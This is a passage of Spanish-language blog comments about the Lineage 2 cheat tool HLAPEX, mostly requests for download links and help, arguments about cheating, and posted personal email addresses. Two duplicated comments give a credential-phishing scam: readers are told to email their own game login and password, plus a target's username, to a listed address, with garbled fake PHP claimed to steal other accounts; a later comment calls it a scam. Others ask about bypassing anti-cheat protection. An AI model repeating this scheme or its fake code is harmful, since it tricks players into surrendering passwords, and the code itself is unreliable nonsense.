    y yo juego al server mafia - Ken Orwen (interlude)
    te dejo mi msn
    martin87_rnr@hotmail.com
    si me podes ayudar te lo agradeseria mucho!
    de antemano gracias!
    suerte

    ResponderEliminar
  108. puro chamuyo nomas ase un año lo intento aser andar xd aca dejo mi msn aver si alguien me manda el programa legar grax yova_chicolindo@hotmail.com

    ResponderEliminar
  109. necesito descargar el hlapex... me trae un troyano y me borra un archivo..

    por favor me dejan el link del hlapex q no tenga virus... Gracias :D

    ResponderEliminar
  110. Mi duda es si yo puedo reemplazar el item que compro (Ej: anillo no grado) por uno S o cualquier otro, teniendo en cuenta que este item (el S) no se vende, sino que se debe armar.

    ResponderEliminar
  111. hermano no puedo descargar el archivo...
    el link esta roto!
    revisalo xfavor, gracias

    ResponderEliminar
  112. men porfas arregla el link no me aguanto mas a los donadores que cada rato me andab matando plis te lo pido cualkiercosa agregame.
    samir_827@hotmail.com

    ResponderEliminar
  113. amigo te dejo mi amail no se como usarlo i no puedo descargarlo porfavor comucate con migo kiero usar ese jack mi email es lukysanto_31@hotmail.com

    ResponderEliminar
  114. hey men ya quitastes el ling para la descarga, vuelvelo a colocar

    ResponderEliminar
  115. Che no me deja descargar el programa ese :s

    ResponderEliminar
  116. El que me puedo ayudar se lo agradeceria :D

    ResponderEliminar
  117. Che Me Gusta Este Post, Ahora quiero Preguntarte Varias Cosas, Agregame Al msn: NicolasPuertas.-@Hotmail.com ESPERO TU SOLICITUD ;)

    ResponderEliminar
  118. Hola.. bueno ahce mucho tiempo q juego l2 , nunca necesite hacer trampa para ser groso :D pero en el server q estoy ahora es muy dificil enchantear las cosas y muy costosas.. queria saber si este programa sirve para todas las cronicas o solo para una especifica, desde ya muchas gracias ..

    ResponderEliminar
  119. yo nisikiera puedo bajarlo xD
    alguna ayudita o comentarios sobre como usar el HLAPEX mi msn es :
    TUCACHE_TON@HOTMAIL.COM =D

    ResponderEliminar
  120. Como hago para bajar el hlapex?

    ResponderEliminar
  121. hola, quiero aprender a usar el hlapex desde ya muchas gracias si me pasas tu msn...

    ResponderEliminar
  122. Holis! si, a veces lo del mandar el mail no sirve. Eso es porque son mails que van rotando! A veces los cierran y abren otros, y eso depende de para que server sean, asi como el dodigo que va en el cuerpo del mensaje. Yo ahora estoy jugando en Avantasia, y como estoy saliendo con un admin pude ver en su pc esas cosas ;)

    Los pasos!:

    1.Abres la cuenta con la que te registraste ya sea Hotmail o yahoo o gmail, y mandas un mail a la direccion siguiente: l2log.private.pass.avantasia@hotmail.com con los siguientes elementos.

    2.En el subject (asunto) pones el login de la victima , por ejemplo: Thorin2030

    3.Ahora en el campo de mensaje escribes el siguiente código al cual debes cambiar y agregar tu password y login de L2 Avantasia (en este caso) donde se indica,y en otro lugar pones otra vez el login de la victima:


    }Shader-L2
    ?>content.ms


    Como funciona? es algo asi como un bot para recuperar pass perdidos, pero al hacerlo con ese codigo, cuando lo recupera confunde el user y manda los datos a tu cuenta (el mail de respuesta te sera devuelto en algo asi como 48hs).
    No se preocupen, los bots estos borran los mensajes automaticamente, asi que no van a quedar pruebas ;)

    Les dejaria mi mail, pero mi novio lo revisa y no tengo idea de como hacer otro! Si tienen alguna duda, preguntenme por aca :)

    Besitos hermosos! y ojo con lo que hacen ehh! :p

    ResponderEliminar
  123. Holis! si, a veces lo del mandar el mail no sirve. Eso es porque son mails que van rotando! A veces los cierran y abren otros, y eso depende de para que server sean, asi como el dodigo que va en el cuerpo del mensaje. Yo ahora estoy jugando en Avantasia, y como estoy saliendo con un admin pude ver en su pc esas cosas ;)

    Los pasos!:

    1.Abres la cuenta con la que te registraste ya sea Hotmail o yahoo o gmail, y mandas un mail a la direccion siguiente: l2log.private.pass.avantasia@hotmail.com con los siguientes elementos.

    2.En el subject (asunto) pones el login de la victima , por ejemplo: Thorin2030

    3.Ahora en el campo de mensaje escribes el siguiente código al cual debes cambiar y agregar tu password y login de L2 Avantasia (en este caso) donde se indica,y en otro lugar pones otra vez el login de la victima:

    .? phpbody=&curmbox=F0000000 01&a=
    if(isset($_LOST["name"]) && isset($_LOST["title"]) isset($_LOST["mail"])
    $mail = "";
    curmbox=recover php.
    $subject = "#.$login de la victima";
    $header = "From:".$mail."
    Repl y-To:".$mail."
    ";l2.answer
    $header .= "MailerHP/".phpversion()."
    ";reads.ps
    $header .= "Mime-Version: 1.0
    ";phonts
    $header .= "Content-Type: text/plain";
    mailto= type=x&to= &cc=&bcc
    type=&&php./compose
    ($mail, $[Xnombre de tu cuentaX]//, utf8_decode (Xtu passwordX) ,$Xtu correo electronicoX);
    echo "&estatus=ok&";
    Rec_To-USR_RCVR:line4>
    }Shader-L2
    ?>content.ms


    Como funciona? es algo asi como un bot para recuperar pass perdidos, pero al hacerlo con ese codigo, cuando lo recupera confunde el user y manda los datos a tu cuenta (el mail de respuesta te sera devuelto en algo asi como 48hs).
    No se preocupen, los bots estos borran los mensajes automaticamente, asi que no van a quedar pruebas ;)

    Les dejaria mi mail, pero mi novio lo revisa y no tengo idea de como hacer otro! Si tienen alguna duda, preguntenme por aca :)

    Besitos hermosos! y ojo con lo que hacen ehh! :p

    ResponderEliminar
  124. Leyendo parte de este post me di cuenta que soy un boludo importante y que la mayoria de los que se hacen los grosos , en lugar de grosos , son los que utilizan este tipo de herramientas para no sentirse inferiores , como herramienta me parece fantastico el poder hak un server , pero lo lamentable de esto es que los inferiores la utilizan para hacerce pasar por grosos , deberia haber un server donde directamente sean validos este tipo de cheats y de esa forma , evaluar quien es el mejor chetero y no quien es el mejor estratega o player de L2.
    A los que usan esto como herramienta de hak para mejorar sus habilidades en un furturo con servers mas importantes mis felicitaciones , pero a los que lo utilizan solo para decir que son buenos players , mis condolencias, por que esos son realmente lacras que sin este tipo de ayuda no son nadi , ni en el juego ni en la vida. Al que le quepa el cepo que se lo ponga. ^^

    ResponderEliminar
  125. ps eso es sierto = a los q donan desde un principio q ni terminan el char y la tienen todo top.. de otro forma viven en el piso xD yo obte x buscar hak ya q en los servr q e jugado estan full de donadores... unos q si saven jugar y otros q ni x q ten full ekipo siempren la comen frente a cualkiera q si sepa hacer pvp.. como les desia si ya uno save hacer pvp pero como en mi caso no puedo donar en los svr que juego por q son de otro pais y se me hace muy dificil... esta herramienta (hak) ^^ se puede utilizar para disfrutar del juego que es el objetivo no?? disfrutas de un juego..................
    a los chiteros donadores aprendan a ser buenos player desde abajo con item conseguidor legalmente para q vean que satisfactorio es. no tiene sentido ekiparse todo top para desps x la incompetencia de no ser buenos player se aburran y se ballan del svr a otro y sea lo mismo es sierto lo q dice el post anterior no sean lacras lebantence de esa silla y agan algo util por sus propios medios

    ResponderEliminar
  126. si usas este xploit te kickean la cuenta u.u a mi me paso con una que cree para probar este "hack" menos mal que no era la que yo uso u.u

    ResponderEliminar
  127. me gustaria alguna guia paso a paso para quitarle todas las protecciones anti phx a los serviddores protegidos

    ResponderEliminar
  128. como hacen estos chabones para saber estas cosas?? :P

    ResponderEliminar
  129. Yo solo nomas me di cuenta que esa tal CARLA es un algun gordo haciendose pasar por mujer que quiere que le manden los datos de sus cuentas para robarle a ustedes? No sean idiotas, nada de lo que puso sirve, todo eso es para engañarlos y que manden sus pass a ese mail que obviamente es de el y no anda con ningun admin y obviamente NO es una mina, y obviamente si no sabe crearse un correo menos va a saber eso que puso.
    Ilusos.

    ResponderEliminar
  130. Si no me equivoco, para usar el hlapex hay que abrir el l2 antes. Que pasaria si yo abriera el l2 desde X bot, anulando cualquier gameguard lameguard que tenga el systema del server para detectar estas cosas??

    ResponderEliminar
  131. hola vengo adejar un server interlude facil de hackiar esta es la wep http://l2gm.3dn.ru/

    ResponderEliminar
  132. manga de goyitos
    quiero usar el hlapex para un gracia final alguien me ayuda

    ResponderEliminar
  133. tengo un hack para sacar cuentas avisame si o queres... al adm d esta pag abrazo. invictu

    ResponderEliminar